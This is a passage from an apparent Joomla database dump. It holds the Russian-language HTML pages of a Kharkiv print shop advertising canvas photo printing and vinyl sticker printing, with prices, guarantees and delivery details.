justify;\">\r\n	<p>(современное дорогостоящее оборудование в отличии от обычных \"бытовых принтеров\" позволяет нам значительно снизить себестоимость картин и производить печать фото на холсте <strong>недорого и очень качественно</strong>. При производстве картин мы используем <em>высококачественный влагостойкий холст. </em>Это очень важно, поскольку при изменении влажности наш холст не подвержен деформации (не дает усадку и не провисает), поэтому&nbsp;<span style=\"color: #ff0000;\"><strong>срок использования наших готовых картин на подрамнике в интерьере - не ограничен</strong></span>)</p>\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;<span style=\"font-size: 130%;\">Компания ЭКВАТОРпринт осуществит <strong>печать на холсте</strong> <strong>любых Ваших</strong> <strong>фото: семейных, свадебных, портретов.</strong> Также у нас можно заказать <strong>печать репродукций картин</strong>, <strong>модульных картин</strong>. <span style=\"background-color: #ffff00;\"><em>Наше оборудование позволяет нам осуществлять </em>фотопечать на холсте<em> наивысшего качества из существующего на рынке печати на холсте.</em></span></span>\r\n	</p>\r\n</div>\r\n<p style=\"font-size: 250%; color: #0000ff; margin: 10px;\"><strong>Как заказать <span style=\"font-size: 60%; color: black;\">по каталогу готовых фото:</span></strong></p>\r\n<p style=\"margin: 10px;\" id=\"maketvideo\">&nbsp;</p>\r\n<p style=\"margin: 10px; text-align: justify; font-size: 140%;\">Для заказа фотокартины на любую тематику: города, цветы, абстракции, пейзажи, природа, и много других, можно воспользоваться бесплатными фотобанками. Найти сайты с тысячами изображений на разные тематики, бесплатных для скачивания можно введя в поисковой системе запрос\r\n	<bolder>\"Обои для рабочего стола\"</bolder>.</p>\r\n<p>&nbsp;</p>\r\n<h3 style=\"margin: 10px; text-align: left; font-size: 160%; color: #0000ff;\"><span style=\"font-family: \'arial black\', sans-serif;\">Как отредактировать макет и заказать фотокартину со смартфона или компьютера:</span></h3>\r\n<p style=\"margin: 10px; font-size: 120%; text-align: justify;\">Если на Вашем устройстве нет установленного фотошопа или другого графического редактора, предлагаем воспользоваться бесплатным редактором макетов на нашем сайте в разделе <a href=\"fotoredaktor\"> ФОТОРЕДАКТОР</a>. <strong>На видео ниже показано, как в нашем редакторе Вы можете полностью подготовить макет для печати</strong>, проверить размер фотографии, обрезать фотографию под нужный Вам размер и если Вы являетесь нашим постоянным клиентом,<strong> оформить заказ со скидкой 40%.</strong> На первом видео показано как подготовить макет со смартфона, на втором видео ниже показано как подготовить макет с компьютера. <strong>Процесс подготовки макета в редакторе занимает в среднем полторы минуты.</strong><br />На третьем видео, в первой половине, показано как сделать цвета макета фоторгафии более яркими и насыщенными, во второй половине показано как перевести изображение из цветного в черно-белое.</p>\r\n<p style=\"margin: 10px; font-size: 180%;\"><span style=\"font-size: 70%;\">Видео 1.</span><br /><strong>Как подготовить макет со смартфона:</strong></p>\r\n<div style=\"margin: 10px; width: 710px; height: 450px; position: relative; border: 1px solid #000; background: url(\'//img.youtube.com/vi/sqHr_NvDxnc/maxresdefault.jpg\')  0% 0% / cover;\">\r\n	<script src=\"/media/youtube/play2.js\" type=\"text/javascript\"></script>\r\n	<div class=\"video1-play\" data-video=\"sqHr_NvDxnc\" onclick=\"videoplay(this);\">&nbsp;</div>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p style=\"margin: 10px; font-size: 180%;\"><span style=\"font-size: 70%;\">Видео 2.</span><br /><strong>Как подготовить макет с компьютера или ноутбука:</strong></p>\r\n<div style=\"margin: 10px; width: 710px; height: 450px; position: relative; border: 1px solid #000; background: url(\'//img.youtube.com/vi/kdu-EuajFZA/maxresdefault.jpg\')  0% 0% / cover;\">\r\n	<script src=\"/media/youtube/play2.js\" type=\"text/javascript\"></script>\r\n	<div class=\"video1-play\" data-video=\"kdu-EuajFZA\" onclick=\"videoplay(this);\">&nbsp;</div>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p style=\"margin: 10px; font-size: 180%;\"><span style=\"font-size: 70%;\">Видео 3.</span><br /><strong>Как сделать цвета на фотографии более \"сочными\":</strong></p>\r\n<div style=\"margin: 10px; width: 710px; height: 450px; position: relative; border: 1px solid #000; background: url(\'//img.youtube.com/vi/6CgC8oXA0Rg/maxresdefault.jpg\')  0% 0% / cover;\">\r\n	<script src=\"/media/youtube/play2.js\" type=\"text/javascript\"></script>\r\n	<div class=\"video1-play\" data-video=\"6CgC8oXA0Rg\" onclick=\"videoplay(this);\">&nbsp;</div>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p style=\"margin: 10px; text-align: justify; font-size: 120%;\"><em>Нашими постоянными клиентами являются многие интернет-галереи картин, фотостудии, художники и дизайнеры. &nbsp;</em></p>\r\n<p style=\"margin: 10px;\"><img title=\"Печать на холсте в ЭКВАТОРпринт\" src=\"images/smilies/canvaspicture1.jpg\" alt=\"Примеры печати в ЭКВАТОРпринт (Харьков)\" width=\"658\" height=\"253\" /></p>\r\n<p>&nbsp;</p>\r\n<div style=\"margin: 10px;\">\r\n	<h3><span style=\"color: #0000ff;\">Наши работы (печать фото на холсте с натяжкой на подрамник):</span></h3>\r\n	<p><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-1.jpg\" alt=\"Kartini 1\" height=\"121\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-2.jpg\" alt=\"Kartini 2\" height=\"121\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-3.jpg\" alt=\"Kartini 3\" height=\"121\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-4.jpg\" alt=\"Kartini 4\" width=\"184\" height=\"121\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-11.jpg\" alt=\"Kartini 11\" height=\"198\" /><img src=\"images/portfolio/Kartini/kartini12.jpg\" alt=\"kartini12\" style=\"border: 1px solid #0000ff;\" height=\"198\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-7.JPG\" alt=\"Kartini 7\" height=\"198\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-8.jpg\" alt=\"Kartini 8\" width=\"302\" height=\"198\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-10.jpg\" alt=\"Kartini 10\" height=\"150\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-9.jpg\" alt=\"Kartini 9\" height=\"150\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-6.JPG\" alt=\"Kartini 6\" height=\"150\" /><img style=\"border: 1px solid #0000cc;\" src=\"images/portfolio/Kartini/Kartini-5.JPG\" alt=\"Kartini 5\" height=\"150\" /><img src=\"images/portfolio/Kartini/kartini14.jpg\" alt=\"kartini14\" style=\"border: 1px solid #0000cc;\" width=\"205\" height=\"150\" /><img src=\"images/portfolio/Kartini/kartini15.jpg\" alt=\"kartini15\" style=\"border: 1px solid #000099;\" height=\"303\" /><img src=\"images/portfolio/Kartini/kartini16.jpg\" alt=\"kartini16\" style=\"border: 1px solid #000099;\" width=\"330\" height=\"303\" /></p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;&nbsp;</p>\r\n<div style=\"margin: 10px; text-align: justify;\">\r\n	<h4><span style=\"color: #0000ff; font-size: 110%;\">Как проверить какой размер фотографии на холсте можно напечатать:</span></h4>\r\n	<p><span style=\"font-size: 130%;\">&nbsp;<strong>Чтобы узнать </strong>максимально большой<strong> размер фотографии</strong> (в см.), который можно напечатать <strong>без потери качества</strong> (не растягивая фотографию), <strong>необходимо размер фотографии в пикселях разделить на 28.</strong></span></p>\r\n	<p><span style=\"font-size: 130%;\">&nbsp;Размер фотографии в пикселях можно посмотреть, зайдя в свойства фотографии (см. рис. ниже). На компьютере нужно кликнуть правой кнопкой мышки на фотографию и <strong>выбрать Свойства - Подробно.</strong></span></p>\r\n	<p><span style=\"font-size: 130%;\">&nbsp;Например, если размер составляет 768х539 пикселей, то размер картины не рекомендуется делать больше чем 27х19см. <br /></span></p>\r\n	<p id=\"zakazat_po_katalogy\"><img title=\"Как посмотреть качество фотографии\" src=\"images/photoquality.jpg\" alt=\"Как посмотреть качество фотографии\" width=\"550\" length=\"auto\" /></p>\r\n	<figure>\r\n		<figcaption>&nbsp;</figcaption>\r\n	</figure>\r\n	<p><span style=\"font-size: 130%; text-align: justify;\">Также рекомендуем обращать внимание на пропорции фотографии перед оформлением заказа. Так, если фотография имеет прямоугольные пропорции, а Вам необходима квадратная, при несоблюдении пропорций часть изображения обрежется или изображение растянется.</span></p>\r\n	<p><span style=\"font-size: 130%; text-align: justify;\"> Также размер фотографии и ее пропорции можно проверить у нас на сайте в разделе ФОТОРЕДАКТОР</span></p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<div style=\"margin: 10px;\">\r\n	<p style=\"font-size: 130%;\">&nbsp;Компания ЭкваторПринт осуществляет печать на холсте в городе Харьков.<br /><span style=\"font-size: 180%; color: #0000ff;\">Доставка осуществляется во все города Украины.</span></p>\r\n	<p style=\"font-size: 130%;\">Оперативно отправляем заказы компанией Новая Почта во все города Украины.</p>\r\n	<p style=\"font-size: 120%; text-align: justify;\">Перед отправкой продукция пакуется в плотный гофрокартон. <strong>Цена упаковки в гофрокартон картин каждого размера указана в таблице ниже.</strong> Все размеры, которые находятся в синей рамке, могут быть отправлены на посылочные отделения Новой Почты (отделения до 30кг.). Размеры, которые за синей рамкой, могут быть отправлены только на грузовые отделения.</p>\r\n	<p><img src=\"images/packingprice.jpg\" alt=\"packingprice\" width=\"725\" /></p>\r\n</div>\r\n<div style=\"margin: 10px; text-align: justify;\">\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;<span style=\"font-size: 140%;\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" title=\"широкоформатная печать Харьков\" href=\"/\">Широкоформатная печать</a></span>&nbsp;картин - &nbsp;отличный способ красиво и оригинально украсить интерьер, <em>фото на холсте</em> неприменно будет отличным подарком.</span><br /><br />&nbsp;<span style=\"font-size: 140%;\">Фотокартины широко используется для декорирования салонов, офисов, магазинов, кафе и квартир</span>.</p>\r\n	<p><span style=\"font-size: 140%;\"><img style=\"float: left;\" title=\"Печать модульных картин в ЭКВАТОРпринт\" src=\"images/smilies/modulnayakartina.jpg\" alt=\"Печать модульных картин в ЭКВАТОРпринт\" width=\"366\" height=\"258\" /></span></p>\r\n	<p><span style=\"font-size: 140%;\"id=\"garantii\">Широкоформатная&nbsp;<a style=\"color: #000000;\" href=\"https://pieraccini.com\" rel=\"alternate\">печать на холсте</a>&nbsp;может помочь Вам создать оригинальный подарок, который будет достойным украшением любого интерьера. <strong>Для печати на</strong> <strong>холсте</strong> можно использовать не только <strong>фотографии</strong> (свадебные, фото родных и т.п.), <strong>но и изображения картин.</strong></span></p>\r\n	<p><span style=\"font-size: 140%;\" >Таким образом можно создать отображающий миг современной жизни или воссоздать произведение великих художников - <em>сделать репродукцию картины</em>.</span></p>\r\n</div>\r\n<div style=\"background-color: #faf9f9; margin: 10px; text-align: justify;\">\r\n	<div style=\"margin: 25px;\">\r\n		<h4 style=\"font-size: 200%; color: #0000ff;\">Наши гарантии:</h4>\r\n		<p style=\"font-size: 140%;\">Мы всегда даем гарантию на нашу продукцию. В течение двух недель со дня готовности заказа, Вы можете оформить обмен или возврат в следующих случаях:</p>\r\n		<p style=\"font-size: 140%;\">1. В случае несоответствия цветов картины цветам макета на мониторе.<br /><span style=\"font-size: 80%;\"> * Многие программы для просмотра фотографий могут немного искажать цвета, поэтому для проверки цветов мы рекомендуем просматривать макет в программе AdobePhotoshop без цветокоррекции или в ФОТОРЕДАКТОРЕ НА НАШЕМ САЙТЕ. Перед возвратом рекомендуем убедиться, что цветопередача Вашего монитора правильная.</span><br /> <span style=\"color: red;\"> <bold>Мы всегда даем гарантию, что цвета Вашего фото на холсте будут максимально соответствовать!</bold></span></p>\r\n		<p style=\"font-size: 140%;\">2. В случае несоответствия размеров картины размерам, указанным в подписанном файле.<span style=\"font-size: 80%;\"> К примеру, вы подписали размер 60х40см, а Вам изготовили 65х50см.</span></p>\r\n		<p style=\"font-size: 140%;\">3. В случае получения поврежденного заказа на почте.<span style=\"font-size: 80%;\"> Для сохранения гарантии по данному пункту просим снимать видео распаковки заказа. Если на видео видно, что при распаковке упаковка целая, но заказ под упаковкой поврежден, мы по согласованию с Вами компенсируем Вам стоимость заказа и доставки или изготовим новый заказ и отправим за наш счет.</span></p>\r\n	</div>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<div style=\"margin: 10px;\">\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;</p>\r\n	<p><img style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />Другие услуги широкоформатной печати выполняемые в \"ЭкваторПринт\":</p>\r\n	<p>- <a title=\"печать на виниле\" href=\"printing-on-vinyl\">печать на виниле (на пленке)</a> - долгий срок службы</p>\r\n	<p>- <a title=\"изготовление баннера\" href=\"banner-printing\">изготовление баннера</a> на прочных материалах</p>\r\n	<p>- <a title=\"печать флагов\" href=\"print-flags\">печать флагов</a> - имиджевая реклама</p>\r\n	<p>- <a title=\"печать фотообоев\" href=\"print-photo\">печать фотообоев</a> - теперь ваш дом будет максимально оригинален</p>\r\n	<p>- <a title=\"широкоформатная печать ситилайтов\" href=\"print-citylights\">печать ситилайтов</a>&nbsp;-&nbsp;наружная реклама вдоль дорог</p>\r\n	<p>- <a title=\"печать на сетке баннерной\" href=\"printing-on-the-grid\">печать на сетке баннерной</a> - для легкой полупрозрачной рекламы</p>\r\n	<p>- <a href=\"modulnye-kartiny\">модульные картины</a> - отличное украшение Вашего интерьера</p>\r\n	<p>- <a title=\"печать больших фотографий\" href=\"print-great-photos\">печать больших фотографий </a>- украсьте свой интерьер</p>\r\n</div>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>','',1,8,'2010-12-01 19:47:48',62,'','2022-01-26 12:13:08',62,0,'0000-00-00 00:00:00','2010-12-01 19:47:48','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1258,25,'печать фото на холсте харьков, картины на холсте','Доставка по Украине. Печать фото на холсте Харьков. (картина по фотографии). Все делаем в готовом виде, холст натянут на подрамник. Низкие цены и высокое качество. Скидки для постоянных клиентов.',1,560993,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(7,41,'Печать на виниле','printing-on-vinyl','<table style=\"width: 600px;\" border=\"0\" align=\"center\">\r\n	<tbody>\r\n		<tr>\r\n			<td>\r\n				<h1 style=\"text-align: center;\"><span style=\"font-size: 80%;\">Печать наклеек на виниле, пленке самоклейке (оракале)</span></h1>\r\n				<p><span style=\"color: #0000ff; font-size: 160%;\"><strong>Цена печати (фотокачество):</strong></span></p>\r\n				<table style=\"width: 718px; height: 206px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n					<tbody>\r\n						<tr style=\"text-align: center; background-color: #172983; height: 40px;\">\r\n							<td style=\"background-color: #000066;\" rowspan=\"2\"><span style=\"color: #ffec00; font-size: 155%;\"><strong>Материал</strong> </span></td>\r\n							<td style=\"background-color: #000066;\" rowspan=\"2\"><span style=\"color: #ffec00; font-size: 110%;\"><strong>Ширина рулона</strong></span></td>\r\n							<td style=\"background-color: #000066;\">\r\n								<p><span style=\"color: #ffec00; font-size: 120%;\"><strong>Стоимость</strong><span style=\"font-size: 90%;\"><strong><br />(грн./м2)</strong></span></span>\r\n								</p>\r\n							</td>\r\n						</tr>\r\n						<tr style=\"background-color: #172983; height: 20px; text-align: center;\">\r\n							<td style=\"background-color: #000066; color: #ffec00; font-size: 90%;\"><strong>от 5 м.кв.</strong></td>\r\n						</tr>\r\n						<tr style=\"text-align: center;\">\r\n							<td style=\"width: 1000px; text-align: left; padding-left: 10px;\"><span style=\"font-size: 160%; font-family: verdana, geneva; color: #000000;\">Самоклеющаяся пленка FOTO<em>JET</em><span style=\"font-size: 60%;\">1440dpi</span></span>\r\n							</td>\r\n							<td width=\"171\"><span style=\"font-size: 100%; font-family: verdana, geneva;\">1.04/1.24</span></td>\r\n							<td width=\"64\"><span style=\"font-size: 170%;\">78</span></td>\r\n						</tr>\r\n						<tr style=\"text-align: center;\">\r\n							<td style=\"width: 1000px; text-align: left; padding-left: 10px;\"><span style=\"font-size: 100%; font-family: verdana, geneva;\"><span style=\"font-size: 170%;\">Самокл пленка перфорированная </span>One Way Vision</span>\r\n							</td>\r\n							<td width=\"171\"><span style=\"font-size: 100%; font-family: verdana, geneva;\">1.04/1.24/1.48</span></td>\r\n							<td width=\"64\"><span style=\"font-size: 170%;\">98</span></td>\r\n						</tr>\r\n					</tbody>\r\n				</table>\r\n				<p style=\"text-align: right; font-size: 140%;\">срок наружного применения не менее пяти лет</p>\r\n				<p style=\"color: #0000ff;\"><strong><span style=\"font-size: 210%;\">Как заказать печать</span> <span style=\"font-size: 140%;\">на самоклеющейся пленке</span>:</strong></p>\r\n				<p><span style=\"background-color: #ff9900; font-size: 180%;\">Заказ на печать пленки можно оформить по <strong>e-mail</strong>.</span> <span style=\"font-size: 150%;\">Для оформления заказа присылайте Ваш макет на наш электронный адрес: <strong><a style=\"background-color: #ff9900; font-size: 150%; color: black;\" href=\"mailto:ekvatorprint@mail.ru\">e@ekvatorprint.com.ua</a></strong> </span></p>\r\n				<p><span style=\"font-size: 110%;\">Файл для печати должен соответствовать</span> <a style=\"color: #0000ff; font-size: 150%;\" href=\"trebovaniya\" rel=\"alternate\">требованиям к макету.</a></p>\r\n				<p><span style=\"font-size: 110%;\">Если Вам необходима печать не на самоклеющейся виниловой пленке, а на армированой виниловой ткани (баннерной ткани), смотрите раздел</span> <a style=\"font-size: 120%;\" href=\"banner-printing\">изготовление баннеров</a>.</p>\r\n				<p style=\"text-align: justify;\"><span style=\"font-size: 130%;\">Для максимально оперативного оформления заказа прикрепленные файлы должны быть подписаны в следующем порядке: количество штук, материал, размеры изделия, дополнительные услуги, остальная информация.</span></p>\r\n				<p><img src=\"images/plenkamaket.jpg\" alt=\"Как правильно подписывать макет печати на самоклеющейся пленке\" width=\"464\" height=\"50\" /></p>\r\n				<p style=\"text-align: justify; font-size: 100%;\">Компания ЭКВАТОРпринт осуществляет <strong>печать наклеек на самоклеющейся</strong> <strong>пленке </strong>ПВХ <em>FotoJet</em> и на <strong>перфорированной самоклеющейся пленке</strong> <em>FotoJet One Way Vision</em>.</p>\r\n				<p style=\"text-align: center;\"><span style=\"font-size: 140%; background-color: #ffff99;\">Наша самоклеющаяся пленка обладает <strong>отличным клеевым слоем</strong>, поддерживает печать высокого качества и при правильном использовании предназначена для длительного применения <strong><span style=\"font-size: 140%;\">(срок наружного применения не менее пяти лет).</span></strong>\r\n					</span>\r\n				</p>\r\n				<p style=\"text-align: justify; font-size: 160%;\">Пленкой FotoJet можно оклеивать любую<span style=\"font-size: 130%;\"> гладкую, <span style=\"background-color: #ffff99;\">обязательно сухую, очищенную и <strong>обезжиренную</strong> поверхность</span>.</span>\r\n				</p>\r\n				<p>&nbsp;&nbsp;</p>\r\n				<p style=\"font-size: 100%; text-align: center;\">При поклейке пленки Вам может быть полезной данная видеоинструкция:</p>\r\n				<h3>\r\n					<iframe style=\"display: block; margin-left: auto; margin-right: auto;\" src=\"https://www.youtube.com/embed/gPBGj9g3b-E\" width=\"336\" height=\"252\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>&nbsp;</h3>\r\n				<h3><span style=\"color: #0000ff;\">Наши работы (печать наклеек на самоклейке FotoJet):</span></h3>\r\n				<p>&nbsp;<img style=\"border: 2px solid #000066;\" src=\"images/our_works_vinyl_topolyok.jpg\" alt=\"Печать на самоклеющейся пленке FotoJet для витрина магазина Тополек\" width=\"295\" height=\"251\" /><img style=\"border: 2px solid #000066;\" src=\"images/vinyl_beauty_saloon.jpg\" alt=\"Самоклейка FotoJet на витрине салона красоты Barberry\" width=\"288\" height=\"251\" /></p>\r\n				<p>&nbsp;</p>\r\n				<p>&nbsp;</p>\r\n				<p style=\"text-align: center; font-size: 130%;\">Компания Экваторпринт осуществляет печать <strong>в Харькове</strong>. <br />Доставка осуществляется <strong>во все города Украины.</strong>&nbsp;</p>\r\n				<p>&nbsp;</p>\r\n				<hr />\r\n				<p style=\"text-align: center;\">&nbsp;</p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td colspan=\"2\">\r\n				<p><img style=\"margin: 5px; float: left; border: 1px solid grey;\" title=\"печать на виниле\" src=\"images/stories/vinil-big.jpg\" alt=\"печать на виниле\" width=\"250\" border=\"0\" /></p>\r\n				<p>В недавнем прошлом винил широко использовался для изготовления пластинок на проигрыватели. Сегодня это уже прошедший этап, и виниловые пластинки используют только любители старины и современные диджеи.</p>\r\n				<p>В наши дни винил особо популярен в <a title=\"широкоформатная печать Харьков\" href=\"/\">широкоформатной печати</a>, в украшении авто, и в <a title=\"изготовление наружной рекламы\" href=\"outdoor-advertising\">изготовлении наружной рекламы</a> на транспорте.</p>\r\n				<p style=\"text-align: justify;\"><strong>Печать на виниле (на пленке) широко применяется для изготовления следующих различных видов рекламы:</strong></p>\r\n				<p>- интерьерная реклама<br />- реклама на авто <br />- аппликации на окнах</p>\r\n				<p>&nbsp;</p>\r\n				<p style=\"text-align: justify;\"><strong>Печать на виниле – стала популярной благодаря целому ряду преимуществ:</strong></p>\r\n				<p style=\"text-align: center;\"><img style=\"float: right; margin: 5px; border: 1px solid grey;\" title=\"печать на виниле\" src=\"images/stories/vinil-avto.jpg\" alt=\"печать на виниле\" width=\"200\" border=\"0\" /></p>\r\n				- высокое качество<br />- возможность оклейки любой поверхности<br />- долговечность<br />- низкая стоимость\r\n				<p style=\"text-align: justify;\">Такой вариант рекламы особо прочен, и практически не поддается повреждениям. <br />Срок службы виниловой самоклеющейся пленки 3-7 лет.</p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td colspan=\"2\">\r\n				<p><span style=\"font-size: medium;\">Креативная реклама с помощью нанесения на транспорт самоклеющейся пленки:</span></p>\r\n				<p>Реклама зоопарка:</p>\r\n				<p><img title=\"печать на самоклеющейся пленке\" src=\"images/stories/kreativnaja-reklama/avto/pechat-na-plenke-zoo.jpg\" alt=\"печать на самоклейке\" width=\"600\" height=\"283\" border=\"0\" /></p>\r\n				Реклама шоколадного батончика:<br />\r\n				<p><img style=\"border: 0pt none;\" title=\"печать на самоклеющейся пленке\" src=\"images/stories/kreativnaja-reklama/avto/pechat-na-plenke-mars.jpg\" alt=\"печать на самоклейке\" width=\"600\" height=\"343\" border=\"0\" /></p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td colspan=\"2\">\r\n				<h2 style=\"text-align: center;\">Печать на оракале</h2>\r\n				<p style=\"text-align: justify;\"><strong>Что такое оракал…</strong></p>\r\n				<p style=\"text-align: justify;\"><br /><strong><img style=\"float: left; margin: 5px;\" title=\"печать на самоклейке - оракале\" src=\"images/stories/pechat-na-orakale.gif\" alt=\"печать на оракале\" border=\"0\" />Оракал</strong> – это марка фирмы производителя&nbsp; самоклеющейся пленки (самоклейки).&nbsp; Данная компания была одной из первых, выпустивших такой вид продукции. Поэтому, до сих пор, многие считают, что «оракал» это синоним «самоклеющейся пленки».<br /><br />На самом же деле <a title=\"orafol\" href=\"https://www.orafol.com\" target=\"_blank\">оракал</a> – это виниловая пленка с самоклеющейся основой, которая производится в Германии компанией <strong>Oracal</strong>.<br /><br />На сегодняшний день фирм изготовителей самоклеющейся пленки много, и множество самоклеющихся пленок ничем не уступают, а иногда и превосходят оракал по качеству.<br /><br /><strong>Печать на оракале</strong> – это высокоэффективная технология, которая применяется для создания рекламных, дизайнерских&nbsp; и информационных продуктов. <br /><br /><strong><span style=\"color: #0000ff;\">Широкие возможности применения самоклеющейся пленки достигаются за счет ее отличных характеристик: </span></strong><br />• При полноцветной печати на самоклейке, краска наносится быстро, «ложится» качественно, тем самым обеспечивается&nbsp; яркое, четкое и насыщенное изображение;<br />•&nbsp;самоклеящаяся пленка оракал характеризуется высокой прочностью и стойкостью. Она хорошо переносит перепады температур, погодные условия и много других факторов влияния внешней среды. При этом внешний презентабельный вид не изменяется.<br /><br /><span style=\"font-size: medium;\">На сегодняшний день, используя <em>печать на самоклеющейся пленке</em> и&nbsp; возможности современной полиграфии можно достичь поистине удивительных и неповторимых решений.<br /></span><br /><span style=\"color: #0000ff;\"><strong>Печать на оракале для краткосрочной (интерьерной) рекламы</strong></span><br /><br />Печать на самоклейке большого формата для интерьера, идеально подходит для производства краткосрочной рекламы эконом, и для долго служащей рекламы. <br />Такой вариант отлично подходит для проведения непродолжительных промо-акций, оформления распродаж. Выставочных стендов, указателей и другой подобной продукции.<br /><br /><span style=\"color: #0000ff;\"><strong>Печать на оракале для длительного применения</strong></span><br /><br />При печати рекламы, рассчитанной на продолжительное использование выбирается более прочный вид пленки. Такая основа подходит для изготовления наружной рекламы, потому как внешнему виду плотного и стойкого оракала не страшны практически никакие погодные условия. <br /><br />В изготовлении наружной рекламы мы можем предложить использование прозрачной и полупрозрачной светорассеивающей пленки, используемой для витражей и конструкций с внутренней подсветкой.<br /><br /><br />Как вы видите, <em>печать на наклеек на оракале дает неограниченные возможности в производстве рекламной продукции</em>. Полиграфическая компания <strong>ЭкваторПринт</strong> – профессионал в изготовлении наружной рекламы на любом из материалов, в особенности на самоклейке оракал.<br /><br />Мы выполняем печать в городе <strong>Харьков</strong>, а также осуществляем доставку по всей Украине, поскольку далеко не в каждом городе найдется полиграфия с такими возможностями и качеством печати как в Экваторпринт.<br /><br /></p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td colspan=\"2\">\r\n				<h4>Печать на самоклеющейся пленке и реклама на транспорте</h4>\r\n				<p style=\"text-align: justify;\"><img style=\"margin: 5px; float: left; border: 1px solid grey;\" src=\"images/stories/vinil-bus.jpg\" alt=\"\" width=\"200\" border=\"0\" />Общественным транспортом в городе Харьков пользуются около 70% процентов населения, да еще к ним добавляют приезжие. А поскольку возможности широкоформатной печати широки, то реклама на транспорте – без сомнения эффективный инструмент привлечения конкретного потребителя.</p>\r\n				<p style=\"text-align: justify;\">По среднестатистическим данным, в месяц общественным транспортом пользуется 75% харьковчан. И очевидно, что и пассажиры транспорта и прохожие на улицах, обязательно обратят внимание на наружную рекламу на транспорте.<br /> <br /> Аккуратную рекламу на транспорте делают с помощью печати на виниле, которая выполняется в высоком качестве, с соблюдением яркости цветов, дизайна и форм. Поэтому, вы можете не ограничивать свою фантазию продумывая внешний вид транспортной рекламы.</p>\r\n				<p style=\"text-align: justify;\"><strong>Печать на виниле</strong> для транспорта предполагает большие размеры и местами полупрозрачный материал (там, где предполагаются окна, мы выполним печать на полупрозрачном материале - сетке.). Делая заказ в полиграфии ЭкваторПринт - вы получите ожидаемый результат высокого качества.</p>\r\n				<p style=\"text-align: justify;\">Реклама на транспорте имеет следующие преимущества:</p>\r\n				<p style=\"text-align: justify;\">- Охват большого процента аудитории <br /> - Лояльное восприятие потребителем <br /> - Период действия рекламы до 16-18 часов в сутки <br /> - Возможность установки на любом маршруте, линии метро</p>\r\n				<p>&nbsp;</p>\r\n				<h4>Печать на виниле для личного авто</h4>\r\n				<p style=\"text-align: justify;\"><strong><img style=\"float: left; margin: 5px;\" src=\"images/stories/vinil-mawina.jpg\" alt=\"\" width=\"200\" border=\"0\" />Печать на виниле</strong> для личного транспорта придает авто индивидуальность. Это новая ступень творчества и средство для самовыражения владельцев машин. Печать на пленке для авто, может сделает ваш транспорт красочным и заметным – вы будете сразу выделяться на фоне других авто. Или же лишь слегка приукрасить транспорт, добавив рисунок с оттенком основного цвета машины.</p>\r\n				<p style=\"text-align: justify;\">Печать на виниле выполняется на эластичной пленке с глянцевой или матовой поверхностью. Винил&nbsp; не боится ни воды, ни грязи. Температурный режим виниловой пленки допустим в пределах –40 °С до +80 °С, поэтому температурные условия нашего региона абсолютно не помеха. Винил сохраняет свой презентабельный вид около 3 – 7 лет.</p>\r\n			</td>\r\n		</tr>\r\n		<tr style=\"background-color: #6699cc;\">\r\n			<td style=\"height: 2px;\">&nbsp;</td>\r\n		</tr>\r\n		<tr>\r\n			<td colspan=\"2\"><img style=\"margin: 1px; border: 0pt none; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />В \"ЭкваторПринт\" вы также можете заказать изготовление таких услуг, как:<br /><br />- <a title=\"печать на холсте\" href=\"printing-on-canvas\">печать на холсте</a> - хороший способ оформить интерьер<br />- <a title=\"печать на сетке баннерной\" 